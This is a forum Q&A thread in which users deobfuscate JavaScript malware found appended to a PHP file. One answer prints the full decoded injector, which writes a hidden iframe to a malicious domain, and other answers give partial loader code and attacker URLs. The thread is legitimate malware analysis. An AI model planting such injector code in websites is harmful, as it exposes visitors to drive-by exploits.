您将如何对此进行逆向工程?

发布于 2024-07-12 11:03:47 字数 248 浏览 10 评论 0 原文

我有一些代码位于 javascript 中的 php 文件的底部。 它经历了很多奇怪的扭曲,比如将十六进制转换为ascii,然后进行正则表达式替换,执行代码等等......

有没有办法在它实际执行之前找出它正在执行的内容?

代码在这里:

http://pastebin.ca/1303597

I've got some code that was at the bottom of a php file that is in javascript. It goes through lots of weird contortions like converting hex to ascii then doing regex replacements, executing code and so on...

Is there any way to find out what it's executing before it actually does it?

The code is here:

http://pastebin.ca/1303597

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(7

满天都是小星星 2024-07-19 11:03:47

你可以一步一步地浏览它 - 因为它是 Javascript,并且它是被解释的,所以它需要有自己的解密器。 如果您可以访问命令行 Javascript 解释器(例如 Firebug 中的控制台),这将是公平的直截了当。

我会看看会发生什么。

编辑我已经完成了大部分内容 - 看起来最后一步并不简单,可能是因为它涉及“argument.callee”。 无论如何,我已经将我迄今为止所拥有的内容放在Pastebin上。

有趣的是,我发现其中最难的部分是给乱码变量指定正确的名称。 它让我想起了填字游戏或数独,你知道事物是如何相关的,但在你弄清楚它的依赖部分是什么之前你不能明确地分配某些东西。 :-) 我确信,如果有人认识到该算法,他们可以为这些部分指定更有意义的名称,但是在进行大量异或操作时,有两个临时变量我刚刚保留为默认名称因为我不知道足够的背景来给他们提供有用的信息。

最终编辑:当我意识到我可以传入我刚刚解码的原始文本时,“arguments.callee”位变得很容易(这是一种非常聪明的技术,因此正常的反混淆会获胜)不起作用,因为当然一旦你重命名变量等,值就会不同)。 不管怎样,这是你的完整脚本:


    function EvilInstaller(){};
    EvilInstaller.prototype = {
        getFrameURL : function() {
            var dlh=document.location.host;
            return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.host + this.path;
        },
        path:'/elanguage.cn/',
        cookieValue:1,
        setCookie : function(name, value) {
            var d= new Date();
            d.setTime(new Date().getTime() + 86400000);
            document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString();
        },
        install : function() {
            if (!this.alreadyInstalled()) {
                var s = "<div style='display:none'><iframe src='" + this.getFrameURL() + "'></iframe></div>"
                try {
                    document.open();
                    document.write(s);
                    document.close();
                }
                catch(e) {
                    document.write("<html><body>" + s + "</body></html>")
                }
                this.setCookie(this.cookieName, this.cookieValue);
            }
        },
        getRandString : function() {
            var l=16,c='0Z1&2Q3Z4*5&6Z7Q8*9)a*b*cQdZeQf*'.replace(/[ZQ&\*\)]/g, '');
            var o='';
            for (var i=0;i<l;i++) {
                o+=c.substr(Math.floor(Math.random()*c.length),1,1);
            }
            return o;
        },
        cookieName:'hedcfagb',
        host:'axa3.cn',
        alreadyInstalled : function() {
            return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
        }
    };
    var evil=new EvilInstaller();
    evil.install();

基本上它看起来像是从 axa3.cn 加载恶意软件。 不过,该网站已经受到 ISP 的怀疑,因此不知道除了一般的不良行为之外,该网站实际上还存在什么。

(如果有人感兴趣,我使用 Pastebin 作为伪 VCS 来更改代码版本,因此您可以看到 另一个中间步骤,在我第一篇编辑文章之后不久,看到不同的混淆层以及它们如何变化是非常有趣的。)

You can just go through it stage by stage - since it's Javascript, and it's interpreted, it needs to be its own decryptor. If you have access to a command-line Javascript interpreter (such as the Console in Firebug), this will be fairly straightforward.

I'll have a look and see what comes up.

Edit I've got through most of it - it seems like the final step is non-trivial, probably because it involves "argument.callee". Anyway I've put up what I have so far on Pastebin.

Interestingly I found the hardest part of this was giving the gibberish variables proper names. It reminded me of a crossword, or sudoku, where you know how things are related, but you can't definitively assign something until you work out what its dependant parts are. :-) I'm sure that if someone recognises the algorithm they can give the parts more meaningful names, but at the bit where there's a lot of XORing going on, there are two temporary variables that I've just left as their default names since I don't know enough context to give them useful ones.

Final edit: The 'arguments.callee' bit became easy when I realised I could just pass in the raw text that I'd ironically just been decoding (it's quite a clever technique, so that normal deobfuscation won't work because of course once you rename the variables, etc, the value is different). Anyway, here's your script in full:


    function EvilInstaller(){};
    EvilInstaller.prototype = {
        getFrameURL : function() {
            var dlh=document.location.host;
            return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.host + this.path;
        },
        path:'/elanguage.cn/',
        cookieValue:1,
        setCookie : function(name, value) {
            var d= new Date();
            d.setTime(new Date().getTime() + 86400000);
            document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString();
        },
        install : function() {
            if (!this.alreadyInstalled()) {
                var s = "<div style='display:none'><iframe src='" + this.getFrameURL() + "'></iframe></div>"
                try {
                    document.open();
                    document.write(s);
                    document.close();
                }
                catch(e) {
                    document.write("<html><body>" + s + "</body></html>")
                }
                this.setCookie(this.cookieName, this.cookieValue);
            }
        },
        getRandString : function() {
            var l=16,c='0Z1&2Q3Z4*5&6Z7Q8*9)a*b*cQdZeQf*'.replace(/[ZQ&\*\)]/g, '');
            var o='';
            for (var i=0;i<l;i++) {
                o+=c.substr(Math.floor(Math.random()*c.length),1,1);
            }
            return o;
        },
        cookieName:'hedcfagb',
        host:'axa3.cn',
        alreadyInstalled : function() {
            return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
        }
    };
    var evil=new EvilInstaller();
    evil.install();

Basically it looks like it loads malware from axa3.cn. The site is already suspected by the ISP though, so no telling what was actually there above and beyond general badness.

(If anyone's interested, I was using Pastebin as a pseudo-VCS for the changing versions of the code, so you can see another intermediate step, a little after my first edit post. It was quite intriguing seeing the different layers of obfuscation and how they changed.)

暮倦 2024-07-19 11:03:47

虽然您可以手动解码,但当您有多个解码阶段时,它很快就会变得乏味。 我通常替换 eval/write 来查看每个步骤:

<script>
    window.__eval= window.eval;
    window.eval= function(s) { if (confirm('OK to eval? '+s)) return this.__eval(s); }
    document.__write= document.write;
    document.write= function(s) { if (confirm('OK to write? '+s)) return this.__write(s); }
</script>

但是,通过对 window.eval 进行故意检查,可以防止此特定脚本出现这种情况。 使用arguments.callee还意味着脚本依赖于特定浏览器的Function.toString格式,在本例中是IE - 它无法在其他浏览器上运行。 您可以在替换 eval 函数中添加解决方法,以便为脚本提供在这种情况下所期望的内容,但这仍然有点痛苦。

您可以使用脚本调试器来单步执行代码,或者我在本例中所做的是允许代码在没有网络的虚拟机中运行,我可以负担得起注销。 通过在代码运行后查看 document.body.innerHTML,我发现它添加了一个不可见的 iframe,指向:

hxxp://62bc13b764ad2799.bbe4e7d3df5fdea8.axa3.cn/elanguage.cn/

它重定向到:

hxxp://google.com.upload.main.update.originalcn.cn/ebay.cn/index.php

在 IE 中的适当条件下查看,它会为您提供大量漏洞利用。 不要访问这些网址

简而言之,您的服务器已被 axa3.cn 黑客攻击,axa3.cn 是目前正在运作的众多由中国托管但由俄罗斯运营的恶意软件团伙之一。

Whilst you can decode manually, it can soon get tedious when you have many stages of decoding. I usually replace eval/write to see each step:

<script>
    window.__eval= window.eval;
    window.eval= function(s) { if (confirm('OK to eval? '+s)) return this.__eval(s); }
    document.__write= document.write;
    document.write= function(s) { if (confirm('OK to write? '+s)) return this.__write(s); }
</script>

However this particular script is protected against this by deliberate inspection of window.eval. Use of arguments.callee also means the script relies on a particular browser's Function.toString format, in this case IE's - it won't work on other browsers. You can put workarounds in the replacement eval function to give the script what it expects in this case, but it's still a bit of a pain.

You could use the Script Debugger to step through the code, or what I did in this case was allow the code to run, in a virtual machine with no networking that I could afford to write off. By looking at document.body.innerHTML after the code had run I found it added an invisible iframe pointed at:

hxxp://62bc13b764ad2799.bbe4e7d3df5fdea8.axa3.cn/elanguage.cn/

which redirects to:

hxxp://google.com.upload.main.update.originalcn.cn/ebay.cn/index.php

which, viewed in suitable conditions in IE, gives you a load of exploits. Don't go to these URLs.

In short your server has been hacked by axa3.cn, one of the many Chinese-hosted but Russian-operated malware gangs in operation at the moment.

黯然 2024-07-19 11:03:47

只需编写一个 perl 脚本或其他将所有转义的十六进制字符更改为 ascii 的东西? 然后只需查看正则表达式以查看到底发生了什么,并使用 perl/whatever 脚本执行相同的操作。

Just write a perl script or something that changes all escaped hex characters to ascii? Then just look through the regexs to see what exactly is happening, and do the same thing with your perl/whatever script.

猫七 2024-07-19 11:03:47

您可以尝试使用 Firebug 控制台并将其分解。 首先:

var jQuery = eval('w;iLn0d;opw;.0epv_a_l;'.replace(/[;0_pL]/g, ''));

只是将“eval”函数屏蔽为“jQuery”

You can try the firebug console and break it down piecemeal. As a start:

var jQuery = eval('w;iLn0d;opw;.0epv_a_l;'.replace(/[;0_pL]/g, ''));

is just masking the "eval" function as "jQuery"

薆情海 2024-07-19 11:03:47

最简单的方法就是简单地使用一个简单的 C 程序将转义的十六进制字符转换为可读文本,如下所示:

#include <stdio.h>

const char wtf[] = ""; // Really long string goes here

int main(void) {
    ::printf("%s\n", wtf);
}

这会产生 这个(我添加了格式)。 我会让你完成最后一部分,看起来更加相似。

Easiest approach would be too simply use a simple c program to convert the escaped hex characters into readable text like so:

#include <stdio.h>

const char wtf[] = ""; // Really long string goes here

int main(void) {
    ::printf("%s\n", wtf);
}

which yields this (I added formatting). I'll let you finish off the last part which appears to be more of the same.

木槿暧夏七纪年 2024-07-19 11:03:47

非常小心 - 如果有人要这么麻烦地混淆代码,这可能是某种攻击脚本,

您可以使用本地 html 文件分阶段输出执行结果,并一次获取一部分

执行此操作get:

var jQuery = "eval(" + 
    'w;iLn0d;opw;.0epv_a_l;'.replace(/[;0_pL]/g, '') + 
    ");";
document.writeln('jQuery=' + jQuery);

产生

jQuery=eval(window.eval);

正如 Crescentfresh 观察到的,它

将变量 jQuery 绑定到 window.eval 函数。 下一节显然是在尝试评估十六进制代码中的某些内容,所以让我们看看十六进制代码字符串是什么样的(出于演示目的手动重新格式化):

    function g4LZ(s9QNvAL)
    {
        function eDdqkXm(fX09)
        {
            var uaWG=0;
            var jtoS=fX09.length;
            var aCD6=0;
            while(aCD6wQ5.length)
                d971I=0;
            if(f234SD>lIXy6md.length)
                f234SD=0;
            kyCyJ+=String.fromCharCode(nCV2eO^ocx) + '';
        }
        eval(kyCyJ);
        return kyCyJ=new String();
    }
    catch(e){}
}
g4LZ('%33...%5e');

现在我们在末尾有一个转义字符串,让我们看看其中有什么unescape (为了展示而被截断):

30248118GA0* l: WRG:nt9*82:)7Z\uF%*{...

坦率地说,我厌倦了把它拆开,所以我把它转储到本地 html 文件中,断开连接从互联网上,打开firefox,禁用javascript,在firefox中加载文件,打开firebug,重新加载页面以便它运行,并检查DOM。

该脚本创建一个 IFRAME,并将 SRC 设置为 [为了安全而更改!]:

http://4b3b9e839fd84e47 [DO NOT CLICK THIS URL] .27f721b7f6c92d76.axa3.cn/elanguage.cn/

axa3.cn 是恶意软件黑名单上的中国域名

very carefully - if someone is going to this much trouble to obfuscate the code, it is probably some kind of attack script

you can output the results of execution in stages using a local html file, and take it a piece at a time

doing this i get:

var jQuery = "eval(" + 
    'w;iLn0d;opw;.0epv_a_l;'.replace(/[;0_pL]/g, '') + 
    ");";
document.writeln('jQuery=' + jQuery);

which yields

jQuery=eval(window.eval);

which, as crescentfresh observed, binds the variable jQuery to the window.eval function.

the next section is obviously trying to eval something in hex code, so let's see what the hex code string looks like (reformatted manually for presentation purposes):

    function g4LZ(s9QNvAL)
    {
        function eDdqkXm(fX09)
        {
            var uaWG=0;
            var jtoS=fX09.length;
            var aCD6=0;
            while(aCD6wQ5.length)
                d971I=0;
            if(f234SD>lIXy6md.length)
                f234SD=0;
            kyCyJ+=String.fromCharCode(nCV2eO^ocx) + '';
        }
        eval(kyCyJ);
        return kyCyJ=new String();
    }
    catch(e){}
}
g4LZ('%33...%5e');

and now we've got an escaped string at the end, let's see what's in there using unescape (truncated for presentation):

30248118GA0* l: WRG:nt9*82:)7Z\uF%*{...

frankly, i'm getting bored taking this apart, so instead i dumped it into a local html file, disconnected from the internet, opened firefox, disabled javascript, loaded the file in firefox, turned on firebug, reloaded the page so it would run, and inspected the DOM.

the script creates an IFRAME with SRC set to [altered for safety!]:

http://4b3b9e839fd84e47 [DO NOT CLICK THIS URL] .27f721b7f6c92d76.axa3.cn/elanguage.cn/

axa3.cn is a chinese domain on the malware blacklist

梦开始←不甜 2024-07-19 11:03:47

我知道这不是答案,但通常(在我看到这种东西的地方),它们被放置,所以如果该行没有执行,所有脚本都会停止。 他们为什么这么做? 好吧,因为他们在脚本(或更通常是模板)上打印了他们的版权。

当人们费尽心思让你给予认可是因为他们确实拥有删除版权许可证时,我建议你付费,因为即使你“逆向工程”,他们也可以(并且有)其他方法来检查是否你的许可证是真实的。 (如果您这样做,其中一些软件实际上会发送某种消息)。

但是,在我得到任何形式的火焰之前,我同意回到这种证券并获取原始代码并打破它是很有趣的 =)

I know its not the answer, but usually(where ive seen this kinda stuff), they are placed so if that line isnt executed, all the script stops. Why do they do that? Well coz they are printing their copyright on the script(or more usually a template).

When people goes to all that trouble for you to give recognition is because they do have a remove copyright licence, i would recommend paying for it, since even if you "reverse engineer" that, they can(and have) other ways to check if your license is true. (some of those softwares will actually send some kind of message if you are doing that).

But, before i get any kind of flame, i agree its interesting to go back in this kind of securities and get the original code and break it =)

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文